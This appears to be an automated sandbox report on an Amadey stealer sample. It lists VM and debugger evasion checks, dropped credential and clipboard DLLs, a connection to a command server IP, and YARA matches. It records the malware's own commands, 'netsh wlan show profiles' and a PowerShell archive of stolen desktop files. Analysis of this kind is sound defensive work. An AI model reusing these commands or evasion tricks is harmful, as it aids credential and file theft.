Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6968 Thread sleep time: -58029s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1072 Thread sleep count: 1332 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 1072 Thread sleep time: -2665332s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4144 Thread sleep count: 1326 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4144 Thread sleep time: -2653326s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6972 Thread sleep count: 258 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6972 Thread sleep time: -7740000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 332 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6980 Thread sleep count: 1077 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 6980 Thread sleep time: -2155077s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4080 Thread sleep count: 1083 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe TID: 4080 Thread sleep time: -2167083s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2032 Thread sleep count: 158 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2032 Thread sleep time: -158000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5772 Thread sleep time: -8301034833169293s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\OneDrive\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Videos\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe File opened: C:\Users\user\Music\desktop.ini Jump to behavior
Source: explorha.exe, explorha.exe, 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: rundll32.exe, 00000008.00000003.2435834677.00000256D12C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b})
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{
Source: explorha.exe, 00000006.00000002.3041565537.0000000000C90000.00000004.00000020.00020000.00000000.sdmp, explorha.exe, 00000006.00000002.3041565537.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D1263000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000008.00000002.2440652752.00000256D12BF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002DF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3037845134.0000000002D9A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000008.00000003.2435834677.00000256D12C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe, 00000000.00000002.1886197108.0000000000FF8000.00000040.00000001.01000000.00000003.sdmp, explorha.exe, 00000001.00000002.1884984098.0000000000A48000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000002.00000002.1908972989.0000000000A48000.00000040.00000001.01000000.00000008.sdmp, explorha.exe, 00000006.00000002.3040422586.0000000000A48000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: netsh.exe, 00000009.00000003.2362319007.0000021FF4074000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_049F043A Start: 049F048B End: 049F040A 6_2_049F043A
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_05660C66 rdtsc 0_2_05660C66
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E47BBB mov eax, dword ptr fs:[00000030h] 0_2_00E47BBB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E4B922 mov eax, dword ptr fs:[00000030h] 0_2_00E4B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_0089B922 mov eax, dword ptr fs:[00000030h] 1_2_0089B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00897BBB mov eax, dword ptr fs:[00000030h] 1_2_00897BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_0089B922 mov eax, dword ptr fs:[00000030h] 2_2_0089B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00897BBB mov eax, dword ptr fs:[00000030h] 2_2_00897BBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0089B922 mov eax, dword ptr fs:[00000030h] 6_2_0089B922
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00897BBB mov eax, dword ptr fs:[00000030h] 6_2_00897BBB
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal Jump to behavior
Source: explorha.exe, explorha.exe, 00000006.00000002.3040681219.0000000000A8D000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: gProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_0087F436 cpuid 6_2_0087F436
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Queries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\CURQNKVOIX.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\JSDNGYCOWY.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\JSDNGYCOWY.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\NIKHQAIQAU.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\NIKHQAIQAU.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\RAYHIWGKDI.xlsx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\Desktop\ZBEDCJPBEY.docx VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\rundll32.exe Queries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe Code function: 0_2_00E2E27A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 0_2_00E2E27A
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00866160 LookupAccountNameA, 6_2_00866160

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information
barindex
Yara detected Amadeys Clipper DLL
Source: Yara match File source: 11.2.rundll32.exe.6c980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Yara detected Amadeys stealer DLL
Source: Yara match File source: 11.2.rundll32.exe.6c980000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.explorha.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.3040424811.000000006C981000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1798578952.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1885241101.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2311033083.00000000047E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3038017624.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1844272709.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1908539379.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1884728884.0000000000861000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.1868196075.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
